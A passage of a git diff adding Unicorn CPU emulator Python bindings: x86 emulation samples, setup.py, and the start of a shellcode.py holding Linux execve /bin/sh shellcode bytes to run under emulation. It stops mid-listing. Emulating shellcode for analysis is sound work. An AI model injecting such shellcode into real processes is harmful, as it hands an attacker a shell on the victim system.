eip = uc.reg_read(UC_X86_REG_EIP) + print("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x" %(port, size, value, eip)) + + # confirm that value is indeed the value of AL/AX/EAX + v = 0 + if size == 1: + # read 1 byte in AL + v = uc.reg_read(UC_X86_REG_AL) + if size == 2: + # read 2 bytes in AX + v = uc.reg_read(UC_X86_REG_AX) + if size == 4: + # read 4 bytes in EAX + v = uc.reg_read(UC_X86_REG_EAX) + + print("--- register value = 0x%x" %v) + + +# Test X86 32 bit +def test_i386(): + print("Emulate i386 code") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + mu.reg_write(UC_X86_REG_XMM0, 0x000102030405060708090a0b0c0d0e0f) + mu.reg_write(UC_X86_REG_XMM1, 0x00102030405060708090a0b0c0d0e0f0) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + r_xmm0 = mu.reg_read(UC_X86_REG_XMM0) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + print(">>> XMM0 = 0x%.32x" %r_xmm0) + + # read from memory + tmp = mu.mem_read(ADDRESS, 4) + print(">>> Read 4 bytes from [0x%x] = 0x" %(ADDRESS), end="") + for i in reversed(tmp): + print("%x" %(i), end="") + print("") + + except UcError as e: + print("ERROR: %s" % e) + + +def test_i386_map_ptr(): + print("Emulate i386 code - use uc_mem_map_ptr()") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32), 2 * UC_SECOND_SCALE) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + # read from memory + tmp = mu.mem_read(ADDRESS, 4) + print(">>> Read 4 bytes from [0x%x] = 0x" %(ADDRESS), end="") + for i in reversed(tmp): + print("%x" %(i), end="") + print("") + + except UcError as e: + print("ERROR: %s" % e) + + +def test_i386_invalid_mem_read(): + print("Emulate i386 code that read from invalid memory") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_READ) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_READ)) + except UcError as e: + print("Failed on uc_emu_start() with error returned 6: %s" % e) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + except UcError as e: + print("ERROR: %s" % e) + +def test_i386_jump(): + print("Emulate i386 code with jump") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_JUMP) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block, begin=ADDRESS, end=ADDRESS) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_JUMP)) + except UcError as e: + print("ERROR: %s" % e) + + print(">>> Emulation done. Below is the CPU context") + + except UcError as e: + print("ERROR: %s" % e) + + +def test_i386_invalid_mem_write(): + print("Emulate i386 code that write to invalid memory") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # intercept invalid memory events + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_WRITE)) + except UcError as e: + print("ERROR: %s" % e) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + # read from memory + print(">>> Read 4 bytes from [0x%x] = 0x" %(0xaaaaaaaa), end="") + tmp = mu.mem_read(0xaaaaaaaa, 4) + for i in reversed(tmp): + if i != 0: + print("%x" %i, end="") + print("") + + try: + tmp = mu.mem_read(0xffffffaa, 4) + print(">>> Read 4 bytes from [0x%x] = 0x" %(0xffffffaa), end="") + for i in reversed(tmp): + print("%x" %i, end="") + print("") + + except UcError as e: + print(">>> Failed to read 4 bytes from [0xffffffaa]") + + except UcError as e: + print("ERROR: %s" % e) + +def test_i386_jump_invalid(): + print("Emulate i386 code that jumps to invalid memory") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_JMP_INVALID) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + try: + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_JMP_INVALID)) + except UcError as e: + print("Failed on uc_emu_start() with error returned 8: %s" %e) + + print(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + except UcError as e: + print("ERROR %s" % e) + +def test_i386_loop(): + print("Emulate i386 code that loop forever") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_LOOP) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_LOOP), timeout=2*UC_SECOND_SCALE) + + print(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + except UcError as e: + print("ERROR: %s" % e) + + +# Test X86 32 bit with IN/OUT instruction +def test_i386_inout(): + print("Emulate i386 code with IN/OUT instructions") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_INOUT) + + # initialize machine registers + mu.reg_write(UC_X86_REG_EAX, 0x1234) + mu.reg_write(UC_X86_REG_ECX, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # handle IN & OUT instruction + mu.hook_add(UC_HOOK_INSN, hook_in, None, 1, 0, UC_X86_INS_IN) + mu.hook_add(UC_HOOK_INSN, hook_out, None, 1, 0, UC_X86_INS_OUT) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_INOUT)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_eax = mu.reg_read(UC_X86_REG_EAX) + print(">>> EAX = 0x%x" %r_eax) + print(">>> ECX = 0x%x" %r_ecx) + except UcError as e: + print("ERROR: %s" % e) + + +def test_i386_context_save(): + print("Save/restore CPU context in opaque blob") + address = 0 + code = b'\x40' # inc eax + try: + # Initialize emulator + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 8KB memory for this emulation + mu.mem_map(address, 8 * 1024, UC_PROT_ALL) + + # write machine code to be emulated to memory + mu.mem_write(address, code) + + # set eax to 1 + mu.reg_write(UC_X86_REG_EAX, 1) + + print(">>> Running emulation for the first time") + mu.emu_start(address, address+1) + + print(">>> Emulation done. Below is the CPU context") + print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + print(">>> Saving CPU context") + saved_context = mu.context_save() + + print(">>> Pickling CPU context") + pickled_saved_context = pickle.dumps(saved_context) + + print(">>> Running emulation for the second time") + mu.emu_start(address, address+1) + print(">>> Emulation done. Below is the CPU context") + print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + + print(">>> Unpickling CPU context") + saved_context = pickle.loads(pickled_saved_context) + + print(">>> CPU context restored. Below is the CPU context") + mu.context_restore(saved_context) + print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + + except UcError as e: + print("ERROR: %s" % e) + +def test_x86_64(): + print("Emulate x86_64 code") + try: + # Initialize emulator in X86-64bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64) + + # initialize machine registers + mu.reg_write(UC_X86_REG_RAX, 0x71f3029efd49d41d) + mu.reg_write(UC_X86_REG_RBX, 0xd87b45277f133ddb) + mu.reg_write(UC_X86_REG_RCX, 0xab40d1ffd8afc461) + mu.reg_write(UC_X86_REG_RDX, 0x919317b4a733f01) + mu.reg_write(UC_X86_REG_RSI, 0x4c24e753a17ea358) + mu.reg_write(UC_X86_REG_RDI, 0xe509a57d2571ce96) + mu.reg_write(UC_X86_REG_R8, 0xea5b108cc2b9ab1f) + mu.reg_write(UC_X86_REG_R9, 0x19ec097c8eb618c1) + mu.reg_write(UC_X86_REG_R10, 0xec45774f00c5f682) + mu.reg_write(UC_X86_REG_R11, 0xe17e9dbec8c074aa) + mu.reg_write(UC_X86_REG_R12, 0x80f86a8dc0f6d457) + mu.reg_write(UC_X86_REG_R13, 0x48288ca5671c5492) + mu.reg_write(UC_X86_REG_R14, 0x595f72f6e4017f6e) + mu.reg_write(UC_X86_REG_R15, 0x1efd97aea331cccc) + + # setup stack + mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions in range [ADDRESS, ADDRESS+20] + mu.hook_add(UC_HOOK_CODE, hook_code64, None, ADDRESS, ADDRESS+20) + + # tracing all memory READ & WRITE access + mu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_access) + mu.hook_add(UC_HOOK_MEM_READ, hook_mem_access) + # actually you can also use READ_WRITE to trace all memory access + #mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE64)) + except UcError as e: + print("ERROR: %s" % e) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + rax = mu.reg_read(UC_X86_REG_RAX) + rbx = mu.reg_read(UC_X86_REG_RBX) + rcx = mu.reg_read(UC_X86_REG_RCX) + rdx = mu.reg_read(UC_X86_REG_RDX) + rsi = mu.reg_read(UC_X86_REG_RSI) + rdi = mu.reg_read(UC_X86_REG_RDI) + r8 = mu.reg_read(UC_X86_REG_R8) + r9 = mu.reg_read(UC_X86_REG_R9) + r10 = mu.reg_read(UC_X86_REG_R10) + r11 = mu.reg_read(UC_X86_REG_R11) + r12 = mu.reg_read(UC_X86_REG_R12) + r13 = mu.reg_read(UC_X86_REG_R13) + r14 = mu.reg_read(UC_X86_REG_R14) + r15 = mu.reg_read(UC_X86_REG_R15) + + print(">>> RAX = 0x%x" %rax) + print(">>> RBX = 0x%x" %rbx) + print(">>> RCX = 0x%x" %rcx) + print(">>> RDX = 0x%x" %rdx) + print(">>> RSI = 0x%x" %rsi) + print(">>> RDI = 0x%x" %rdi) + print(">>> R8 = 0x%x" %r8) + print(">>> R9 = 0x%x" %r9) + print(">>> R10 = 0x%x" %r10) + print(">>> R11 = 0x%x" %r11) + print(">>> R12 = 0x%x" %r12) + print(">>> R13 = 0x%x" %r13) + print(">>> R14 = 0x%x" %r14) + print(">>> R15 = 0x%x" %r15) + + + except UcError as e: + print("ERROR: %s" % e) + + +def test_x86_64_syscall(): + print("Emulate x86_64 code with 'syscall' instruction") + try: + # Initialize emulator in X86-64bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64_SYSCALL) + + def hook_syscall(mu, user_data): + rax = mu.reg_read(UC_X86_REG_RAX) + if rax == 0x100: + mu.reg_write(UC_X86_REG_RAX, 0x200) + else: + print('ERROR: was not expecting rax=%d in syscall' % rax) + + # hook interrupts for syscall + mu.hook_add(UC_HOOK_INSN, hook_syscall, None, 1, 0, UC_X86_INS_SYSCALL) + + # syscall handler is expecting rax=0x100 + mu.reg_write(UC_X86_REG_RAX, 0x100) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE64_SYSCALL)) + except UcError as e: + print("ERROR: %s" % e) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + rax = mu.reg_read(UC_X86_REG_RAX) + print(">>> RAX = 0x%x" % rax) + + except UcError as e: + print("ERROR: %s" % e) + + +def test_x86_16(): + print("Emulate x86 16-bit code") + try: + # Initialize emulator in X86-16bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_16) + + # map 8KB memory for this emulation + mu.mem_map(0, 8 * 1024) + + # set CPU registers + mu.reg_write(UC_X86_REG_EAX, 7) + mu.reg_write(UC_X86_REG_EBX, 5) + mu.reg_write(UC_X86_REG_ESI, 6) + + # write machine code to be emulated to memory + mu.mem_write(0, X86_CODE16) + + # emulate machine code in infinite time + mu.emu_start(0, len(X86_CODE16)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + tmp = mu.mem_read(11, 1) + print(">>> Read 1 bytes from [0x%x] = 0x%x" %(11, tmp[0])) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_x86_16() + test_i386() + print("=" * 35) + test_i386_map_ptr() + print("=" * 35) + test_i386_inout() + print("=" * 35) + test_i386_context_save() + print("=" * 35) + test_i386_jump() + print("=" * 35) + test_i386_loop() + print("=" * 35) + test_i386_invalid_mem_read() + print("=" * 35) + test_i386_invalid_mem_write() + print("=" * 35) + test_i386_jump_invalid() + test_x86_64() + print("=" * 35) + test_x86_64_syscall() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.cfg b/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.cfg new file mode 100644 index 0000000..3c6e79c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.cfg @@ -0,0 +1,2 @@ +[bdist_wheel] +universal=1 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.py new file mode 100644 index 0000000..836dab8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.py @@ -0,0 +1,291 @@ +#!/usr/bin/env python +# Python binding for Unicorn engine. Nguyen Anh Quynh <aquynh@gmail.com> + +from __future__ import print_function +import glob +import os +import subprocess +import shutil +import sys +import platform + +from distutils import log +from distutils.core import setup +from distutils.util import get_platform +from distutils.command.build import build +from distutils.command.sdist import sdist +from setuptools.command.bdist_egg import bdist_egg +from setuptools.command.develop import develop + +SYSTEM = sys.platform + +# sys.maxint is 2**31 - 1 on both 32 and 64 bit mingw +IS_64BITS = platform.architecture()[0] == '64bit' + +# are we building from the repository or from a source distribution? +ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) +LIBS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'lib') +HEADERS_DIR = os.path.join(ROOT_DIR, 'unicorn', 'include') +SRC_DIR = os.path.join(ROOT_DIR, 'src') +BUILD_DIR = SRC_DIR if os.path.exists(SRC_DIR) else os.path.join(ROOT_DIR, '../..') + +# Parse version from pkgconfig.mk +VERSION_DATA = {} +with open(os.path.join(BUILD_DIR, 'pkgconfig.mk')) as fp: + lines = fp.readlines() + for line in lines: + line = line.strip() + if len(line) == 0: + continue + if line.startswith('#'): + continue + if '=' not in line: + continue + + k, v = line.split('=', 1) + k = k.strip() + v = v.strip() + if len(k) == 0 or len(v) == 0: + continue + VERSION_DATA[k] = v + +if 'PKG_MAJOR' not in VERSION_DATA or \ + 'PKG_MINOR' not in VERSION_DATA or \ + 'PKG_EXTRA' not in VERSION_DATA: + raise Exception("Malformed pkgconfig.mk") + +if 'PKG_TAG' in VERSION_DATA: + VERSION = '{PKG_MAJOR}.{PKG_MINOR}.{PKG_EXTRA}.{PKG_TAG}'.format(**VERSION_DATA) +else: + VERSION = '{PKG_MAJOR}.{PKG_MINOR}.{PKG_EXTRA}'.format(**VERSION_DATA) + +if SYSTEM == 'darwin': + LIBRARY_FILE = "libunicorn.dylib" + MAC_LIBRARY_FILE = "libunicorn*.dylib" + STATIC_LIBRARY_FILE = None +elif SYSTEM == 'win32': + LIBRARY_FILE = "unicorn.dll" + STATIC_LIBRARY_FILE = "unicorn.lib" +elif SYSTEM == 'cygwin': + LIBRARY_FILE = "cygunicorn.dll" + STATIC_LIBRARY_FILE = None +else: + LIBRARY_FILE = "libunicorn.so" + STATIC_LIBRARY_FILE = None + +def clean_bins(): + shutil.rmtree(LIBS_DIR, ignore_errors=True) + shutil.rmtree(HEADERS_DIR, ignore_errors=True) + +def copy_sources(): + """Copy the C sources into the source directory. + This rearranges the source files under the python distribution + directory. + """ + src = [] + + os.system('make -C %s clean' % os.path.join(ROOT_DIR, '../..')) + shutil.rmtree(SRC_DIR, ignore_errors=True) + os.mkdir(SRC_DIR) + + shutil.copytree(os.path.join(ROOT_DIR, '../../qemu'), os.path.join(SRC_DIR, 'qemu/')) + shutil.copytree(os.path.join(ROOT_DIR, '../../msvc'), os.path.join(SRC_DIR, 'msvc/')) + shutil.copytree(os.path.join(ROOT_DIR, '../../include'), os.path.join(SRC_DIR, 'include/')) + # make -> configure -> clean -> clean tests fails unless tests is present + shutil.copytree(os.path.join(ROOT_DIR, '../../tests'), os.path.join(SRC_DIR, 'tests/')) + try: + # remove site-specific configuration file + # might not exist + os.remove(os.path.join(SRC_DIR, 'qemu/config-host.mak')) + except OSError: + pass + + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.[ch]"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.mk"))) + + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../Makefile"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../LICENSE*"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../README.md"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../*.TXT"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../RELEASE_NOTES"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../make.sh"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../CMakeLists.txt"))) + src.extend(glob.glob(os.path.join(ROOT_DIR, "../../pkgconfig.mk"))) + + for filename in src: + outpath = os.path.join(SRC_DIR, os.path.basename(filename)) + log.info("%s -> %s" % (filename, outpath)) + shutil.copy(filename, outpath) + +def build_libraries(): + """ + Prepare the unicorn directory for a binary distribution or installation. + Builds shared libraries and copies header files. + + Will use a src/ dir if one exists in the current directory, otherwise assumes it's in the repo + """ + cwd = os.getcwd() + clean_bins() + os.mkdir(HEADERS_DIR) + os.mkdir(LIBS_DIR) + + # copy public headers + shutil.copytree(os.path.join(BUILD_DIR, 'include', 'unicorn'), os.path.join(HEADERS_DIR, 'unicorn')) + + # check if a prebuilt library exists + # if so, use it instead of building + if os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE)): + shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', LIBRARY_FILE), LIBS_DIR) + if STATIC_LIBRARY_FILE is not None and os.path.exists(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE)): + shutil.copy(os.path.join(ROOT_DIR, 'prebuilt', STATIC_LIBRARY_FILE), LIBS_DIR) + return + + # otherwise, build!! + os.chdir(BUILD_DIR) + + try: + subprocess.check_call(['msbuild', '-ver']) + except: + has_msbuild = False + else: + has_msbuild = True + + if has_msbuild and SYSTEM == 'win32': + if platform.architecture()[0] == '32bit': + plat = 'Win32' + elif 'win32' in sys.argv: + plat = 'Win32' + else: + plat = 'x64' + + conf = 'Debug' if os.getenv('DEBUG', '') else 'Release' + subprocess.call(['msbuild', 'unicorn.sln', '-m', '-p:Platform=' + plat, '-p:Configuration=' + conf], cwd=os.path.join(BUILD_DIR, 'msvc')) + + obj_dir = os.path.join(BUILD_DIR, 'msvc', plat, conf) + shutil.copy(os.path.join(obj_dir, LIBRARY_FILE), LIBS_DIR) + shutil.copy(os.path.join(obj_dir, STATIC_LIBRARY_FILE), LIBS_DIR) + else: + # platform description refs at https://docs.python.org/2/library/sys.html#sys.platform + new_env = dict(os.environ) + new_env['UNICORN_BUILD_CORE_ONLY'] = 'yes' + cmd = ['sh', './make.sh'] + if SYSTEM == "win32": + if IS_64BITS: + cmd.append('cross-win64') + else: + cmd.append('cross-win32') + + subprocess.call(cmd, env=new_env) + + if SYSTEM == 'darwin': + for file in glob.glob(MAC_LIBRARY_FILE): + try: + shutil.copy(file, LIBS_DIR, follow_symlinks=False) + except: + shutil.copy(file, LIBS_DIR) + else: + shutil.copy(LIBRARY_FILE, LIBS_DIR) + try: + # static library may fail to build on windows if user doesn't have visual studio installed. this is fine. + if STATIC_LIBRARY_FILE is not None: + shutil.copy(STATIC_LIBRARY_FILE, LIBS_DIR) + except: + print('Warning: Could not build static library file! This build is not appropriate for a binary distribution') + # enforce this + if 'upload' in sys.argv: + sys.exit(1) + os.chdir(cwd) + +class custom_sdist(sdist): + def run(self): + clean_bins() + copy_sources() + return sdist.run(self) + +class custom_build(build): + def run(self): + if 'LIBUNICORN_PATH' in os.environ: + log.info("Skipping building C extensions since LIBUNICORN_PATH is set") + else: + log.info("Building C extensions") + build_libraries() + return build.run(self) + +class custom_develop(develop): + def run(self): + log.info("Building C extensions") + build_libraries() + return develop.run(self) + +class custom_bdist_egg(bdist_egg): + def run(self): + self.run_command('build') + return bdist_egg.run(self) + +def dummy_src(): + return [] + + +if 'bdist_wheel' in sys.argv and '--plat-name' not in sys.argv: + idx = sys.argv.index('bdist_wheel') + 1 + sys.argv.insert(idx, '--plat-name') + name = get_platform() + if 'linux' in name: + # linux_* platform tags are disallowed because the python ecosystem is fubar + # linux builds should be built in the centos 5 vm for maximum compatibility + # see https://github.com/pypa/manylinux + # see also https://github.com/angr/angr-dev/blob/master/bdist.sh + sys.argv.insert(idx + 1, 'manylinux1_' + platform.machine()) + elif 'mingw' in name: + if IS_64BITS: + sys.argv.insert(idx + 1, 'win_amd64') + else: + sys.argv.insert(idx + 1, 'win32') + else: + # https://www.python.org/dev/peps/pep-0425/ + sys.argv.insert(idx + 1, name.replace('.', '_').replace('-', '_')) + + +long_desc = ''' +Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework +based on [QEMU](https://qemu.org). + +Unicorn offers some unparalleled features: + +- Multi-architecture: ARM, ARM64 (ARMv8), M68K, MIPS, SPARC, and X86 (16, 32, 64-bit) +- Clean/simple/lightweight/intuitive architecture-neutral API +- Implemented in pure C language, with bindings for Crystal, Clojure, Visual Basic, Perl, Rust, Ruby, Python, Java, .NET, Go, Delphi/Free Pascal, Haskell, Pharo, and Lua. +- Native support for Windows & *nix (with Mac OSX, Linux, *BSD & Solaris confirmed) +- High performance via Just-In-Time compilation +- Support for fine-grained instrumentation at various levels +- Thread-safety by design +- Distributed under free software license GPLv2 + +Further information is available at https://www.unicorn-engine.org +''' + +setup( + provides=['unicorn'], + packages=['unicorn'], + name='unicorn', + version=VERSION, + author='Nguyen Anh Quynh', + author_email='aquynh@gmail.com', + description='Unicorn CPU emulator engine', + long_description=long_desc, + long_description_content_type="text/markdown", + url='https://www.unicorn-engine.org', + classifiers=[ + 'License :: OSI Approved :: BSD License', + 'Programming Language :: Python :: 2', + 'Programming Language :: Python :: 3', + ], + requires=['ctypes'], + cmdclass={'build': custom_build, 'develop': custom_develop, 'sdist': custom_sdist, 'bdist_egg': custom_bdist_egg}, + zip_safe=False, + include_package_data=True, + is_pure=False, + package_data={ + 'unicorn': ['lib/*', 'include/unicorn/*'] + } +) diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/shellcode.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/shellcode.py new file mode 100644 index 0000000..3c63e90 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/shellcode.py @@ -0,0 +1,179 @@ +#!/usr/bin/env python +# Sample code for X86 of Unicorn. +# Nguyen Anh Quynh <aquynh@gmail.com> +# KaiJern Lau <kj@theshepherdlab.io> + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * + +# Original shellcode from this example. +#X86_CODE32 = b"\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f" + +# Linux/x86 execve /bin/sh shellcode 23 bytes, from http://shell-storm.org/shellcode/files/shellcode-827.php +# 0: 31 c0 xor eax,eax +# 2: 50 push eax +# 3: 68 2f 2f 73 68 push 0x68732f2f +# 8: 68 2f 62 69 6e push 0x6e69622f +# d: 89 e3 mov ebx,esp +# f: 50 push eax +# 10: 53 push ebx +# 11: 89 e1 mov ecx,esp +# 13: b0 0b mov al,0xb +# 15: cd 80 int 0x80 +X86_CODE32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" +X86_CODE32_SELF = b"\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41" + +# Linux/x86 64bit execve /bin/sh shellcode +# 0: 48 31 ff xor rdi,rdi +# 3: 57 push rdi +# 4: 57 push rdi +# 5: 5e pop rsi +# 6: 5a pop rdx +# 7: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f +# e: 2f 73 68 +# 11: 48 c1 ef 08 shr rdi,0x8 +# 15: 57 push rdi +# 16: 54 push rsp +# 17: 5f pop rdi +# 18: 6a 3b push 0x3b +# 1a: 58 pop rax +# 1b: 0f 